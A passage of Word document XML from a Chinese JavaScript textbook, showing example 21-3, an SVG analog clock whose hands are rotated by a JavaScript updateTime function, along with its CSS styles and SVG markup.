        <w:t>元素树来实现一个动态的时钟。那张静态的时钟图片包含两个</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>line</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素来分别表示时针和分针。两条线都竖直显示，表示时间</w:t>
      </w:r>
      <w:r>
        <w:t>12:00</w:t>
      </w:r>
      <w:r>
        <w:t>。随后，通过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>设置每个＜</w:t>
      </w:r>
      <w:r>
        <w:t>line</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>transform</w:t>
      </w:r>
      <w:r>
        <w:t>属性，让它们旋转一定的角度以显示正确的时间，以此来实现一个动态时钟。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251723776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4041475" cy="1496683"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="64" name="00064.jpeg" descr="000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4.jpeg" descr="00064.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4041475" cy="1496683"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　一个</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>时钟</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要注意的是，例</w:t>
      </w:r>
      <w:r>
        <w:t>21-3</w:t>
      </w:r>
      <w:r>
        <w:t>直接将</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>标记内嵌到</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>文件中，而没有在</w:t>
      </w:r>
      <w:r>
        <w:t>XHTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件中使用</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>命名空间。这就意味着，它只有在支持直接内嵌</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器中才能正常工作。然而，通过将</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件转换成</w:t>
      </w:r>
      <w:r>
        <w:t>XHTML</w:t>
      </w:r>
      <w:r>
        <w:t>，同样的技术也能够在早期支持</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器中生效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-3</w:t>
      </w:r>
      <w:r>
        <w:t>：通过控制</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>图片来显示时间</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title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Analog Clock</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function updateTime()</w:t>
      </w:r>
      <w:r>
        <w:t>{//</w:t>
      </w:r>
      <w:r>
        <w:t>更新</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>时钟来显示当前时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var now=new Date();//</w:t>
      </w:r>
      <w:r>
        <w:t>当前时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var min=now.getMinutes();//</w:t>
      </w:r>
      <w:r>
        <w:t>分钟</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var hour=(now.getHours()%12)+min/60;//</w:t>
      </w:r>
      <w:r>
        <w:t>转换成可以在时钟上表示的时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var minangle=min*6;//</w:t>
      </w:r>
      <w:r>
        <w:t>每</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6Text"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>表示一分钟</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var hourangle=hour*30;//</w:t>
      </w:r>
      <w:r>
        <w:t>每</w:t>
      </w:r>
      <w:r>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6Text"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>表示一个小时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>获取表示时钟时针和分针的</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var minhand=document.getElementById("minuteh</w:t>
      </w:r>
      <w:r>
        <w:t>and");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var hourhand=document.getElementById("hourhand");//</w:t>
      </w:r>
      <w:r>
        <w:t>设置这些元素的</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>属性，将它们移动到钟面上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>minhand.setAttribute("transform","rotate("+minangle+",50,50)");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>hourhand.setAttribute("transform","rotate("+hourangle+",50,50)");//</w:t>
      </w:r>
      <w:r>
        <w:t>每一分钟更新下时钟显示时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>setTimeout(updateTime,60000);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t>下面定义的所有</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式都会作用在</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>元素上</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#clock{/*</w:t>
      </w:r>
      <w:r>
        <w:t>用于时钟的全局样式</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stroke:black;/*</w:t>
      </w:r>
      <w:r>
        <w:t>黑线</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stroke-linecap:round;/*</w:t>
      </w:r>
      <w:r>
        <w:t>圆角</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>fill:#eef;/*</w:t>
      </w:r>
      <w:r>
        <w:t>以浅蓝灰色为背景</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#face{stroke-width:3px;}/*</w:t>
      </w:r>
      <w:r>
        <w:t>时钟的外边框</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#ticks{stroke-width:2;}/*</w:t>
      </w:r>
      <w:r>
        <w:t>标记每个小时的线段</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#hourhand{stroke-width:5px;}/*</w:t>
      </w:r>
      <w:r>
        <w:t>相对较粗的时针</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#minutehand{stroke-width:3px;}/*</w:t>
      </w:r>
      <w:r>
        <w:t>相对较细的分针</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#numbers{/*</w:t>
      </w:r>
      <w:r>
        <w:t>如何绘制数字</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>font-family:sans-serif;font-size:7pt;font-weight:bold;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text-anchor:middle;stroke:none;fill:black;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</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 onload="updateTime()"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--viewBox</w:t>
      </w:r>
      <w:r>
        <w:t>是坐标系，</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>是指屏幕大小</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">svg </w:t>
      </w:r>
      <w:r>
        <w:t>id="clock"viewBox="0 0 100 100"width="500"height="500"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>defs</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>定义下拉阴影的滤镜</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>filter id="shadow"x="-50%"y="-50%"width="200%"height="200%"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>feGaussianBlur in="SourceAlpha"stdDeviation="1"result="blur"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>feOffset in="blur"dx="1"dy="1"result="shadow"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>eMerge</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>feMergeNode in="SourceGraphic"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>feMergeNode in="shadow"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/feMerge</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/filter</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/defs</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>circle id="face"cx="50"cy="50"r="45"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>钟面</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>g id="ticks"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--12</w:t>
      </w:r>
      <w:r>
        <w:t>小时的刻度</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>line x1='50'y1='5.000'x2='50.00'y2='10.00'/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>line x1='72.50'y1='11.03'x2='70.00</w:t>
      </w:r>
      <w:r>
        <w:t>'y2='15.36'/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>line x1='88.97'y1='27.50'x2='84.64'y2='30.00'/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>line x1='95.00'y1='50.00'x2='90.00'y2='50.00'/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>line x1='88.97'y1='72.50'x2='84.64'y2='70.00'/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>line x1='72.50'y1='88.97'x2='70.00'y2='84.64'/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">line </w:t>
      </w:r>
      <w:r>
        <w:t>x1='50.00'y1='95.00'x2='50.00'y2='90.00'/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>line x1='27.50'y1='88.97'x2='30.00'y2='84.64'/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>line x1='11.03'y1='72.50'x2='15.36'y2='70.00'/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>line x1='5.000'y1='50.00'x2='10.00'y2='50.00'/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>line x1='11.03'y1='27.50'x2='15.36'y2='30.00'/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>line x1='27.50'y</w:t>
      </w:r>
      <w:r>
        <w:t>1='11.03'x2='30.00'y2='15.36'/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/g</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>g id="numbers"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>标记重要的几个刻度值</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>text x="50"y="18"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/text</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>text x="85"y="53"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/text</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>text x="50"y="88"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/text</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>text x="15"y="53"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/text</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/g</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>初始绘制成竖直的指针，之后通过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码来做旋转</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>g id="hands"filter="url(#shad</w:t>
      </w:r>
      <w:r>
        <w:t>ow)"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
